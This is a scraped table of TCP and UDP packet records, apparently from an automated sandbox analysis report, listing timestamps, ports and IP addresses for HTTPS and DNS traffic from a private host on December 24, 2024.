                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.209930897 CET50003443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.211287975 CET44350002172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.211369038 CET44350002172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.211412907 CET50002443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.250484943 CET44350005162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.250561953 CET44350005162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.250642061 CET50005443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.252075911 CET44350006162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.252130032 CET44350006162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.252207041 CET50006443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.815366983 CET44350087188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.815448046 CET50087443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.815896034 CET50087443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.815922022 CET44350087188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.818681002 CET50087443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:45.818695068 CET44350087188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.668250084 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.668324947 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.668380022 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.668474913 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.668495893 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.668541908 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.669610977 CET50062443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.669637918 CET44350062188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.697334051 CET44350087188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.697446108 CET50087443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.697480917 CET44350087188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.697534084 CET50087443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.697535992 CET44350087188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.697578907 CET50087443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.698225021 CET50087443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:46.698266029 CET44350087188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:47.485748053 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:47.485773087 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:47.485856056 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:47.486080885 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:47.486093044 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.464423895 CET50002443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.464466095 CET44350002172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.464507103 CET50003443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.464556932 CET44350003172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.893605947 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.893939972 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.894484997 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.894490004 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896491051 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896495104 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896563053 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896578074 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896584034 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896595001 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896673918 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896694899 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896702051 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896708965 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896819115 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896837950 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896850109 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.896856070 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.897011042 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.897023916 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.897073984 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:48.897077084 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.455496073 CET50005443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.455516100 CET44350005162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.455662012 CET50006443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.455697060 CET44350006162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539268017 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539346933 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539493084 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539493084 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539593935 CET50094443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.539602041 CET44350094188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.579400063 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.579441071 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.579545975 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.579749107 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:50.579765081 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.589788914 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.589824915 CET4435011020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.589886904 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.591181993 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.591192961 CET4435011020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.977440119 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.977519035 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.978056908 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.978069067 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.979743958 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:51.979753017 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:52.865195990 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:52.865263939 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:52.865295887 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:52.865319014 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:52.865487099 CET50107443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:52.865511894 CET44350107188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:52.866775036 CET50117443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:52.866820097 CET44350117188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:52.866875887 CET50117443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:52.867115021 CET50117443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:52.867135048 CET44350117188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.324805975 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.324887037 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.324975967 CET50023443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.432449102 CET4435002523.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.432534933 CET4435002523.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.432631016 CET50025443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.511043072 CET50025443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.511051893 CET4435002523.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.511055946 CET50023443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.511130095 CET4435002323.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.817255974 CET4435011020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.817364931 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.819103003 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.819111109 CET4435011020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.819319963 CET4435011020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.821053028 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.821115971 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.821120024 CET4435011020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.821261883 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:53.867337942 CET4435011020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:54.275161982 CET44350117188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:54.275326967 CET50117443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:54.275723934 CET50117443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:54.275728941 CET44350117188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:54.277376890 CET50117443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:54.277380943 CET44350117188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:54.374749899 CET4435011020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:54.375370026 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:54.375386953 CET4435011020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:54.375457048 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:54.375457048 CET50110443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:55.185190916 CET44350117188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:55.185270071 CET44350117188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:55.185276985 CET50117443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:55.185326099 CET50117443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:55.185456038 CET50117443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:55.185496092 CET44350117188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.141520023 CET4435005323.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.141607046 CET4435005323.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.141700983 CET50053443192.168.2.623.44.203.82
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.148907900 CET4435005223.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.148988008 CET4435005223.44.203.82192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:57.149029016 CET50052443192.168.2.623.44.203.82

                                                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:59.652141094 CET5901153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:26:59.897907972 CET53590111.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:37.444346905 CET5292153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:37.583091974 CET53529211.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.543375015 CET5388053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:39.874469995 CET53538801.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.286474943 CET53650971.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.302912951 CET53577681.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.422966003 CET5442253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.423118114 CET5568553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.560391903 CET53544221.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:56.560415030 CET53556851.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:27:59.034697056 CET53515931.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:00.538826942 CET53596781.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:01.223457098 CET53590781.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:21.552251101 CET5257453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:21.552359104 CET6494553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:21.689524889 CET53649451.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:23.948728085 CET5666753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:23.949038029 CET5529253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.487586021 CET6286853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.487981081 CET5810253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.624630928 CET53628681.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:24.814085960 CET53581021.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.018891096 CET4962353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.019294024 CET5451553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.022005081 CET5914253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.022485018 CET5969653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.033370972 CET5341953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.033798933 CET5581653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.157049894 CET53496231.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.157109976 CET53545151.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.160084009 CET53591421.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.160903931 CET53596961.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.171585083 CET53534191.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.171863079 CET53558161.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.623245955 CET5313753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.623352051 CET5455653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.634798050 CET5176453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.634932041 CET6085553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.760341883 CET53545561.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.760910988 CET53531371.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.763448954 CET6324053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.763608932 CET6047253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.902831078 CET53604721.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.908133984 CET6067853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:26.908287048 CET5651653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:27.045588017 CET53565161.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:28.673049927 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.166798115 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.227776051 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.537197113 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.783471107 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.794567108 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.794585943 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.794667959 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.794682026 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.802707911 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.803878069 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.804307938 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.805818081 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:29.814917088 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.097486973 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121190071 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121264935 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121274948 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121290922 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121299982 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121309042 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121613026 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.121742010 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.122476101 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.130270958 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.131922007 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.132087946 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.151933908 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.316623926 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.316665888 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.316678047 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.316886902 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.317373037 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.318594933 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.325211048 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.435455084 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.463840961 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.466448069 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646193027 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646291018 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646301985 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646311998 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646851063 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.646935940 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.650347948 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.652007103 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.665643930 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.666316032 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.960866928 CET44352802162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:30.997117043 CET52802443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.961328030 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.961498976 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.984811068 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:31.984965086 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.276895046 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.277733088 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.277956963 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.278366089 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.279196024 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.279402971 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.300685883 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.301060915 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:32.301848888 CET44362882172.64.41.3192.168.2.6
